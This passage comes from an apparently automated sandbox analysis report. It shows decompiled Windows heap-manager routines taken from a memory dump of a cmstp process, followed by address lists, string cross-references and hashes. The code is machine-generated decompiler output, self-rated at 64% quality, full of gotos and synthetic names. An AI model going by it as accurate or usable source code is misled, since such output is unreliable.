						if(_t256 >= 0x7f000) {
							_t142 = _t553 + 0x1ec;
							 *_t142 =  *(_t553 + 0x1ec) - _t256;
							__eflags =  *_t142;
							_t256 =  *(_t452 + 0x14);
						}
						_t513 = _v48;
						_t445 = _t445 + (_t256 >> 3) + 0x20;
						_a4 = _t445;
						_v40 = 1;
					} else {
						_t27 =  &_v36;
						 *_t27 = _v36 & 0x00000000;
						__eflags =  *_t27;
					}
					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
						_v44 = _t513;
						_t262 = E050DA9EF(_t541, _t513);
						__eflags = _a8;
						_v32 = _t262;
						if(_a8 != 0) {
							__eflags = _t262;
							if(_t262 == 0) {
								goto L19;
							}
						}
						__eflags =  *0x51c8748 - 1;
						if( *0x51c8748 >= 1) {
							__eflags = _t262;
							if(_t262 == 0) {
								_t415 =  *[fs:0x30];
								__eflags =  *(_t415 + 0xc);
								if( *(_t415 + 0xc) == 0) {
									_push("HEAP: ");
									E050DB150();
								} else {
									E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E050DB150();
								__eflags =  *0x51c7bc8;
								if( *0x51c7bc8 == 0) {
									__eflags = 1;
									E05192073(_t445, 1, _t541, 1);
								}
								_t513 = _v48;
								_t445 = _a4;
							}
						}
						_t350 = _v40;
						_t480 = _t445 << 3;
						_v20 = _t480;
						_t481 = _t480 + _t513;
						_v24 = _t481;
						__eflags = _t350;
						if(_t350 == 0) {
							_t481 = _t481 + 0xfffffff0;
							__eflags = _t481;
						}
						_t483 = (_t481 & 0xfffff000) - _v44;
						__eflags = _t483;
						_v52 = _t483;
						if(_t483 == 0) {
							__eflags =  *0x51c8748 - 1;
							if( *0x51c8748 < 1) {
								goto L9;
							}
							__eflags = _t350;
							goto L146;
						} else {
							_t352 = E0510174B( &_v44,  &_v52, 0x4000);
							__eflags = _t352;
							if(_t352 < 0) {
								goto L94;
							}
							_t353 = E050F7D50();
							_t447 = 0x7ffe0380;
							__eflags = _t353;
							if(_t353 != 0) {
								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t356 = 0x7ffe0380;
							}
							__eflags =  *_t356;
							if( *_t356 != 0) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0x240) & 0x00000001;
								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
									E051914FB(_t447, _t553, _v44, _v52, 5);
								}
							}
							_t358 = _v32;
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t484 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t484 - 0x7f000;
							if(_t484 >= 0x7f000) {
								_t90 = _t553 + 0x1ec;
								 *_t90 =  *(_t553 + 0x1ec) - _t484;
								__eflags =  *_t90;
							}
							E050D9373(_t553, _t358);
							_t486 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							E050D9819(_t486);
							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
							_t366 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t366 - 0x7f000;
							if(_t366 >= 0x7f000) {
								_t104 = _t553 + 0x1ec;
								 *_t104 =  *(_t553 + 0x1ec) + _t366;
								__eflags =  *_t104;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t533 = _v52 + _v44;
								_v32 = _t533;
								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
								__eflags = _v24 - _v52 + _v44;
								if(_v24 == _v52 + _v44) {
									__eflags =  *(_t553 + 0x4c);
									if( *(_t553 + 0x4c) != 0) {
										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
									}
								} else {
									_t449 = 0;
									_t533[3] = 0;
									_t533[1] = 0;
									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t491 = _t394;
									 *_t533 = _t394;
									__eflags =  *0x51c8748 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t491 - 1;
										if(_t491 <= 1) {
											_t404 =  *[fs:0x30];
											__eflags =  *(_t404 + 0xc);
											if( *(_t404 + 0xc) == 0) {
												_push("HEAP: ");
												E050DB150();
											} else {
												E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											E050DB150();
											_pop(_t491);
											__eflags =  *0x51c7bc8 - _t449; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												_t491 = 1;
												E05192073(_t449, 1, _t541, 0);
											}
											_t533 = _v32;
										}
									}
									_t533[1] = _t449;
									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
										_t402 = (_t533 - _t541 >> 0x10) + 1;
										_v16 = _t402;
										__eflags = _t402 - 0xfe;
										if(_t402 >= 0xfe) {
											_push(_t491);
											_push(_t449);
											E0519A80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
											_t533 = _v48;
											_t402 = _v32;
										}
										_t449 = _t402;
									}
									_t533[3] = _t449;
									E050FA830(_t553, _t533,  *_t533 & 0x0000ffff);
									_t447 = 0x7ffe0380;
								}
							}
							_t367 = E050F7D50();
							__eflags = _t367;
							if(_t367 != 0) {
								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t370 = _t447;
							}
							__eflags =  *_t370;
							if( *_t370 != 0) {
								_t371 =  *[fs:0x30];
								__eflags =  *(_t371 + 0x240) & 1;
								if(( *(_t371 + 0x240) & 1) != 0) {
									__eflags = E050F7D50();
									if(__eflags != 0) {
										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E05191411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
								}
							}
							_t372 = E050F7D50();
							_t546 = 0x7ffe038a;
							_t446 = 0x230;
							__eflags = _t372;
							if(_t372 != 0) {
								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t246 = 0x7ffe038a;
							}
							__eflags =  *_t246;
							if( *_t246 == 0) {
								goto L7;
							} else {
								__eflags = E050F7D50();
								if(__eflags != 0) {
									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
									__eflags = _t546;
								}
								_push( *_t546 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								goto L120;
							}
						}
					} else {
						L19:
						_t31 = _t513 + 0x101f; // 0x101f
						_t455 = _t31 & 0xfffff000;
						_t32 = _t513 + 0x28; // 0x28
						_v44 = _t455;
						__eflags = _t455 - _t32;
						if(_t455 == _t32) {
							_t455 = _t455 + 0x1000;
							_v44 = _t455;
						}
						_t265 = _t445 << 3;
						_v24 = _t265;
						_t266 = _t265 + _t513;
						__eflags = _v40;
						_v20 = _t266;
						if(_v40 == 0) {
							_t266 = _t266 + 0xfffffff0;
							__eflags = _t266;
						}
						_t267 = _t266 & 0xfffff000;
						_v52 = _t267;
						__eflags = _t267 - _t455;
						if(_t267 < _t455) {
							__eflags =  *0x51c8748 - 1; // 0x0
							if(__eflags < 0) {
								L9:
								_t450 = _t553;
								L10:
								_push(_t445);
								goto L11;
							}
							__eflags = _v40;
							L146:
							if(__eflags == 0) {
								goto L9;
							}
							_t270 =  *[fs:0x30];
							__eflags =  *(_t270 + 0xc);
							if( *(_t270 + 0xc) == 0) {
								_push("HEAP: ");
								E050DB150();
							} else {
								E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							E050DB150();
							__eflags =  *0x51c7bc8;
							if( *0x51c7bc8 == 0) {
								__eflags = 0;
								E05192073(_t445, 1, _t541, 0);
							}
							L152:
							_t445 = _a4;
							L153:
							_t513 = _v48;
							goto L9;
						}
						_v32 = _t267;
						_t280 = _t267 - _t455;
						_v32 = _v32 - _t455;
						__eflags = _a8;
						_t460 = _v32;
						_v52 = _t460;
						if(_a8 != 0) {
							L27:
							__eflags = _t280;
							if(_t280 == 0) {
								L33:
								_t446 = 0;
								__eflags = _v40;
								if(_v40 == 0) {
									_t468 = _v44 + _v52;
									_v36 = _t468;
									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
									__eflags = _v20 - _v52 + _v44;
									if(_v20 == _v52 + _v44) {
										__eflags =  *(_t553 + 0x4c);
										if( *(_t553 + 0x4c) != 0) {
											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
										}
									} else {
										_t468[3] = 0;
										_t468[1] = 0;
										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
										_t521 = _t317;
										 *_t468 = _t317;
										__eflags =  *0x51c8748 - 1; // 0x0
										if(__eflags >= 0) {
											__eflags = _t521 - 1;
											if(_t521 <= 1) {
												_t327 =  *[fs:0x30];
												__eflags =  *(_t327 + 0xc);
												if( *(_t327 + 0xc) == 0) {
													_push("HEAP: ");
													E050DB150();
												} else {
													E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
												}
												_push("(LONG)FreeEntry->Size > 1");
												E050DB150();
												__eflags =  *0x51c7bc8 - _t446; // 0x0
												if(__eflags == 0) {
													__eflags = 1;
													E05192073(_t446, 1, _t541, 1);
												}
												_t468 = _v36;
											}
										}
										_t468[1] = _t446;
										_t522 =  *((intOrPtr*)(_t541 + 0x18));
										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
											_t320 = _t446;
										} else {
											_t320 = (_t468 - _t541 >> 0x10) + 1;
											_v12 = _t320;
											__eflags = _t320 - 0xfe;
											if(_t320 >= 0xfe) {
												_push(_t468);
												_push(_t446);
												E0519A80D(_t522, 3, _t468, _t541);
												_t468 = _v52;
												_t320 = _v28;
											}
										}
										_t468[3] = _t320;
										E050FA830(_t553, _t468,  *_t468 & 0x0000ffff);
									}
								}
								E050FB73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
								E050FA830(_t553, _v64, _v24);
								_t286 = E050F7D50();
								_t542 = 0x7ffe0380;
								__eflags = _t286;
								if(_t286 != 0) {
									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t289 = 0x7ffe0380;
								}
								__eflags =  *_t289;
								if( *_t289 != 0) {
									_t290 =  *[fs:0x30];
									__eflags =  *(_t290 + 0x240) & 1;
									if(( *(_t290 + 0x240) & 1) != 0) {
										__eflags = E050F7D50();
										if(__eflags != 0) {
											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E05191411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
									}
								}
								_t291 = E050F7D50();
								_t543 = 0x7ffe038a;
								__eflags = _t291;
								if(_t291 != 0) {
									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t246 = 0x7ffe038a;
								}
								__eflags =  *_t246;
								if( *_t246 != 0) {
									__eflags = E050F7D50();
									if(__eflags != 0) {
										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags = _t543;
									}
									_push( *_t543 & 0x000000ff);
									_push(_t446);
									_push(_t446);
									L120:
									_push( *(_t553 + 0x74) << 3);
									_push(_v52);
									_t246 = E05191411(_t446, _t553, _v44, __eflags);
								}
								goto L7;
							}
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t339 = E0510174B( &_v44,  &_v52, 0x4000);
							__eflags = _t339;
							if(_t339 < 0) {
								L94:
								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									goto L153;
								}
								E050FB73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
								goto L152;
							}
							_t344 = E050F7D50();
							__eflags = _t344;
							if(_t344 != 0) {
								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t347 = 0x7ffe0380;
							}
							__eflags =  *_t347;
							if( *_t347 != 0) {
								_t348 =  *[fs:0x30];
								__eflags =  *(_t348 + 0x240) & 1;
								if(( *(_t348 + 0x240) & 1) != 0) {
									E051914FB(_t445, _t553, _v44, _v52, 6);
								}
							}
							_t513 = _v48;
							goto L33;
						}
						__eflags =  *_v12 - 3;
						_t513 = _v48;
						if( *_v12 == 3) {
							goto L27;
						}
						__eflags = _t460;
						if(_t460 == 0) {
							goto L9;
						}
						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
							goto L9;
						}
						goto L27;
					}
				}
				_t445 = _a4;
				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t513 = __edx;
					goto L10;
				}
				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
				_v20 = _t433;
				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
					_t513 = _t539;
					goto L9;
				} else {
					_t437 = E050F99BF(__ecx, __edx,  &_a4, 0);
					_t445 = _a4;
					_t514 = _t437;
					_v56 = _t514;
					if(_t445 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						E050FA830(__ecx, _t514, _t445);
						_t506 =  *(_t553 + 0x238);
						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
						_t246 = _t506 >> 4;
						if(_t551 < _t506 - _t246) {
							_t508 =  *(_t553 + 0x23c);
							_t246 = _t508 >> 2;
							__eflags = _t551 - _t508 - _t246;
							if(_t551 > _t508 - _t246) {
								_t246 = E0510ABD8(_t553);
								 *(_t553 + 0x23c) = _t551;
								 *(_t553 + 0x238) = _t551;
							}
						}
						goto L7;
					}
				}
			}

0x050fa309
0x050fa316
0x050fa319
0x050fa31d
0x050fa32d
0x050fa331
0x05141e0d
0x05141e10
0x050fa3cb
0x050fa3cb
0x050fa3bd
0x050fa3c3
0x050fa3c3
0x050fa33a
0x05141e17
0x05141e1b
0x05141e1d
0x05141e2f
0x05141e34
0x05141e36
0x05141e3c
0x05141e3c
0x05141e3c
0x05141e3c
0x05141e36
0x05141e42
0x05141e45
0x05141e47
0x050fa3f8
0x050fa3f8
0x050fa3fb
0x050fa3fd
0x05141e50
0x050fa403
0x050fa411
0x050fa411
0x050fa411
0x050fa41e
0x050fa420
0x050fa424
0x050fa427
0x050fa7c9
0x050fa7cd
0x050fa7d2
0x050fa7d9
0x050fa7e0
0x050fa7e3
0x050fa7ed
0x050fa7f3
0x050fa7f9
0x050fa7ff
0x050fa802
0x050fa807
0x050fa809
0x050fa809
0x050fa809
0x050fa80f
0x050fa80f
0x050fa812
0x050fa81c
0x050fa821
0x050fa824
0x050fa42d
0x050fa42d
0x050fa42d
0x050fa42d
0x050fa42d
0x050fa436
0x050fa43a
0x050fa609
0x050fa60d
0x050fa612
0x050fa616
0x050fa61a
0x05141e57
0x05141e59
0x00000000
0x00000000
0x05141e5f
0x050fa620
0x050fa627
0x05141e64
0x05141e66
0x05141e6c
0x05141e72
0x05141e76
0x05141e95
0x05141e9a
0x05141e78
0x05141e8d
0x05141e92
0x05141ea0
0x05141ea5
0x05141eaa
0x05141eb2
0x05141eb6
0x05141eb9
0x05141eb9
0x05141ebe
0x05141ec2
0x05141ec2
0x05141e66
0x050fa62d
0x050fa633
0x050fa636
0x050fa63a
0x050fa63c
0x050fa640
0x050fa642
0x050fa644
0x050fa644
0x050fa644
0x050fa64d
0x050fa64d
0x050fa651
0x050fa655
0x05141eca
0x05141ed1
0x00000000
0x00000000
0x05141ed7
0x00000000
0x050fa65b
0x050fa669
0x050fa66e
0x050fa670
0x00000000
0x00000000
0x050fa676
0x050fa67b
0x050fa680
0x050fa682
0x05141f1a
0x050fa688
0x050fa688
0x050fa688
0x050fa68a
0x050fa68d
0x05141f24
0x05141f2a
0x05141f31
0x05141f43
0x05141f43
0x05141f31
0x050fa693
0x050fa697
0x050fa69d
0x050fa6a0
0x050fa6a6
0x050fa6a8
0x050fa6a8
0x050fa6a8
0x050fa6a8
0x050fa6b2
0x050fa6b7
0x050fa6c1
0x050fa6c6
0x050fa6d2
0x050fa6d9
0x050fa6e3
0x050fa6e6
0x050fa6eb
0x050fa6ed
0x050fa6ed
0x050fa6ed
0x050fa6ed
0x050fa6f3
0x050fa6f8
0x050fa702
0x050fa70a
0x050fa70e
0x050fa71a
0x050fa71e
0x05141fcb
0x05141fcf
0x05141fdd
0x05141fe3
0x05141fe3
0x050fa724
0x050fa728
0x050fa72a
0x050fa72d
0x050fa737
0x050fa73a
0x050fa73c
0x050fa742
0x050fa748
0x05141f4d
0x05141f50
0x05141f56
0x05141f5c
0x05141f5f
0x05141f7e
0x05141f83
0x05141f61
0x05141f76
0x05141f7b
0x05141f89
0x05141f8e
0x05141f93
0x05141f94
0x05141f9a
0x05141f9c
0x05141f9e
0x05141fa1
0x05141fa1
0x05141fa6
0x05141fa6
0x05141f50
0x050fa74e
0x050fa751
0x050fa754
0x050fa75d
0x050fa75e
0x050fa762
0x050fa767
0x05141faf
0x05141fb0
0x05141fb9
0x05141fbe
0x05141fc2
0x05141fc2
0x050fa76d
0x050fa76d
0x050fa775
0x050fa778
0x050fa77d
0x050fa77d
0x050fa71e
0x050fa782
0x050fa787
0x050fa789
0x05141ff3
0x050fa78f
0x050fa78f
0x050fa78f
0x050fa791
0x050fa794
0x05141ffd
0x05142006
0x0514200c
0x05142017
0x05142019
0x05142024
0x05142024
0x05142024
0x05142047
0x05142047
0x0514200c
0x050fa79a
0x050fa79f
0x050fa7a4
0x050fa7a9
0x050fa7ab
0x0514205a
0x050fa7b1
0x050fa7b1
0x050fa7b1
0x050fa7b3
0x050fa7b6
0x00000000
0x050fa7bc
0x05142066
0x05142068
0x05142073
0x05142073
0x05142073
0x05142078
0x05142079
0x0514207d
0x00000000
0x0514207d
0x050fa7b6
0x050fa440
0x050fa440
0x050fa440
0x050fa446
0x050fa44c
0x050fa44f
0x050fa453
0x050fa455
0x051420b3
0x051420b9
0x051420b9
0x050fa45d
0x050fa460
0x050fa464
0x050fa466
0x050fa46b
0x050fa46f
0x050fa471
0x050fa471
0x050fa471
0x050fa474
0x050fa479
0x050fa47d
0x050fa47f
0x05142229
0x0514222f
0x050fa3c8
0x050fa3c8
0x050fa3ca
0x050fa3ca
0x00000000
0x050fa3ca
0x05142235
0x0514223a
0x0514223a
0x00000000
0x00000000
0x05142240
0x05142246
0x0514224a
0x05142269
0x0514226e
0x0514224c
0x05142261
0x05142266
0x05142274
0x05142279
0x0514227e
0x05142286
0x05142288
0x0514228d
0x0514228d
0x05142292
0x05142292
0x05142295
0x05142295
0x00000000
0x05142295
0x050fa485
0x050fa489
0x050fa48b
0x050fa48f
0x050fa493
0x050fa497
0x050fa49b
0x050fa4bb
0x050fa4bb
0x050fa4bd
0x050fa4ff
0x050fa4ff
0x050fa501
0x050fa505
0x050fa50f
0x050fa517
0x050fa51b
0x050fa527
0x050fa52b
0x05142182
0x05142185
0x05142193
0x05142199
0x05142199
0x050fa531
0x050fa535
0x050fa538
0x050fa548
0x050fa54b
0x050fa54d
0x050fa553
0x050fa559
0x05142100
0x05142103
0x05142109
0x0514210f
0x05142112
0x05142131
0x05142136
0x05142114
0x05142129
0x0514212e
0x0514213c
0x05142141
0x05142147
0x0514214d
0x05142151
0x05142154
0x05142154
0x05142159
0x05142159
0x05142103
0x050fa55f
0x050fa562
0x050fa565
0x050fa567
0x05142162
0x050fa56d
0x050fa574
0x050fa575
0x050fa579
0x050fa57e
0x05142169
0x0514216a
0x05142170
0x05142175
0x05142179
0x05142179
0x050fa57e
0x050fa584
0x050fa58f
0x050fa58f
0x050fa52b
0x050fa5ad
0x050fa5bc
0x050fa5c1
0x050fa5c6
0x050fa5cb
0x050fa5cd
0x051421a9
0x050fa5d3
0x050fa5d3
0x050fa5d3
0x050fa5d5
0x050fa5d8
0x051421b3
0x051421bc
0x051421c2
0x051421cd
0x051421cf
0x051421da
0x051421da
0x051421da
0x051421f7
0x051421f7
0x051421c2
0x050fa5de
0x050fa5e3
0x050fa5e8
0x050fa5ea
0x0514220a
0x050fa5f0
0x050fa5f0
0x050fa5f0
0x050fa5f2
0x050fa5f5
0x05142219
0x0514221b
0x0514208c
0x0514208c
0x0514208c
0x05142095
0x05142096
0x05142097
0x05142098
0x051420a4
0x051420a5
0x051420a9
0x051420a9
0x00000000
0x050fa5f5
0x050fa4bf
0x050fa4d3
0x050fa4d8
0x050fa4da
0x05141ede
0x05141ede
0x05141ee4
0x05141ee9
0x00000000
0x00000000
0x05141f07
0x00000000
0x05141f07
0x050fa4e0
0x050fa4e5
0x050fa4e7
0x051420cb
0x050fa4ed
0x050fa4ed
0x050fa4ed
0x050fa4f2
0x050fa4f5
0x051420d5
0x051420de
0x051420e4
0x051420f6
0x051420f6
0x051420e4
0x050fa4fb
0x00000000
0x050fa4fb
0x050fa4a1
0x050fa4a4
0x050fa4a8
0x00000000
0x00000000
0x050fa4aa
0x050fa4ac
0x00000000
0x00000000
0x050fa4b2
0x050fa4b5
0x00000000
0x00000000
0x00000000
0x050fa4b5
0x050fa43a
0x050fa340
0x050fa346
0x050fa600
0x00000000
0x050fa600
0x050fa34f
0x050fa351
0x050fa358
0x050fa3c6
0x00000000
0x050fa371
0x050fa37a
0x050fa37f
0x050fa382
0x050fa384
0x050fa394
0x00000000
0x050fa396
0x050fa399
0x050fa3a7
0x050fa3b0
0x050fa3b4
0x050fa3bb
0x050fa3d2
0x050fa3da
0x050fa3df
0x050fa3e1
0x050fa3e5
0x050fa3ea
0x050fa3f0
0x050fa3f0
0x050fa3e1
0x00000000
0x050fa3bb
0x050fa394

Strings

(UCRBlock != NULL), xrefs: 05141EA0
(LONG)FreeEntry->Size > 1, xrefs: 0514213C
(!TrailingUCR), xrefs: 05142274
((LONG)FreeEntry->Size > 1), xrefs: 05141F89
HEAP[%wZ]: , xrefs: 05141E88, 05141F71, 05142124, 0514225C
HEAP: , xrefs: 05141E95, 05141F7E, 05142131, 05142269

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: 93a4794f2a18e1a5ed17bf8df041a0a335b7178dbee54500db2da182d7283d37
Instruction ID: 15a42c174e60ab20c347cb0c24174b00a9a0bfdee7a40c2b50278ea090c02899
Opcode Fuzzy Hash: 93a4794f2a18e1a5ed17bf8df041a0a335b7178dbee54500db2da182d7283d37
Instruction Fuzzy Hash: E642DC343087419FC725CF28D888A6EBBE6FF88604F08496DF99A8B651D734D981CF52

Uniqueness

Uniqueness Score: -1.00%

Function 05192D82 Relevance: 7.7, Strings: 6, Instructions: 228
COMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E05192D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t83;
				signed char _t89;
				intOrPtr _t90;
				signed char _t101;
				signed int _t102;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				intOrPtr _t108;
				intOrPtr _t112;
				short* _t130;
				short _t131;
				signed int _t148;
				intOrPtr _t149;
				signed int* _t154;
				short* _t165;
				signed int _t171;
				void* _t182;

				_push(0x44);
				_push(0x51b0e80);
				E0512D0E8(__ebx, __edi, __esi);
				_t177 = __edx;
				_t181 = __ecx;
				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
				 *((char*)(_t182 - 0x1d)) = 0;
				 *(_t182 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t182 - 4)) = 0;
					 *((intOrPtr*)(_t182 - 4)) = 1;
					_t83 = E050D40E1("RtlAllocateHeap");
					__eflags = _t83;
					if(_t83 == 0) {
						L48:
						 *(_t182 - 0x24) = 0;
						L49:
						 *((intOrPtr*)(_t182 - 4)) = 0;
						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
						E051930C4();
						goto L50;
					}
					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
					 *(_t182 - 0x28) = _t89;
					 *(_t182 - 0x3c) = _t89;
					_t177 =  *(_t182 + 8);
					__eflags = _t177;
					if(_t177 == 0) {
						_t171 = 1;
						__eflags = 1;
					} else {
						_t171 = _t177;
					}
					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
					__eflags = _t148 - 0x10;
					if(_t148 < 0x10) {
						_t148 = 0x10;
					}
					_t149 = _t148 + 8;
					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
					__eflags = _t149 - _t177;
					if(_t149 < _t177) {
						L44:
						_t90 =  *[fs:0x30];
						__eflags =  *(_t90 + 0xc);
						if( *(_t90 + 0xc) == 0) {
							_push("HEAP: ");
							E050DB150();
						} else {
							E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t181 + 0x78)));
						E050DB150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
						goto L48;
					} else {
						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
							goto L44;
						}
						__eflags = _t89 & 0x00000001;
						if((_t89 & 0x00000001) != 0) {
							_t178 =  *(_t182 - 0x28);
						} else {
							E050EEEF0( *((intOrPtr*)(_t181 + 0xc8)));
							 *((char*)(_t182 - 0x1d)) = 1;
							_t178 =  *(_t182 - 0x28) | 0x00000001;
							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
						}
						E05194496(_t181, 0);
						_t177 = L050F4620(_t181, _t181, _t178,  *(_t182 + 8));
						 *(_t182 - 0x24) = _t177;
						_t173 = 1;
						E051949A4(_t181);
						__eflags = _t177;
						if(_t177 == 0) {
							goto L49;
						} else {
							_t177 = _t177 + 0xfffffff8;
							__eflags =  *((char*)(_t177 + 7)) - 5;
							if( *((char*)(_t177 + 7)) == 5) {
								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
								__eflags = _t177;
							}
							_t154 = _t177;
							 *(_t182 - 0x40) = _t177;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
								if(__eflags != 0) {
									_push(_t154);
									_t173 = _t177;
									E0518FA2B(0, _t181, _t177, _t177, _t181, __eflags);
								}
							}
							__eflags =  *(_t177 + 2) & 0x00000002;
							if(( *(_t177 + 2) & 0x00000002) == 0) {
								_t101 =  *(_t177 + 3);
								 *(_t182 - 0x29) = _t101;
								_t102 = _t101 & 0x000000ff;
							} else {
								_t130 = E050D1F5B(_t177);
								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
								__eflags =  *(_t181 + 0x40) & 0x08000000;
								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
									 *_t130 = 0;
								} else {
									_t131 = E051016C7(1, _t173);
									_t165 =  *((intOrPtr*)(_t182 - 0x30));
									 *_t165 = _t131;
									_t130 = _t165;
								}
								_t102 =  *(_t130 + 2) & 0x0000ffff;
							}
							 *(_t182 - 0x34) = _t102;
							 *(_t182 - 0x28) = _t102;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *_t177;
							}
							__eflags =  *(_t181 + 0x40) & 0x20000000;
							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
								__eflags = 0;
								E05194496(_t181, 0);
							}
							__eflags =  *(_t182 - 0x24) -  *0x51c6360; // 0x0
							_t104 =  *[fs:0x30];
							if(__eflags != 0) {
								_t105 =  *(_t104 + 0x68);
								 *(_t182 - 0x4c) = _t105;
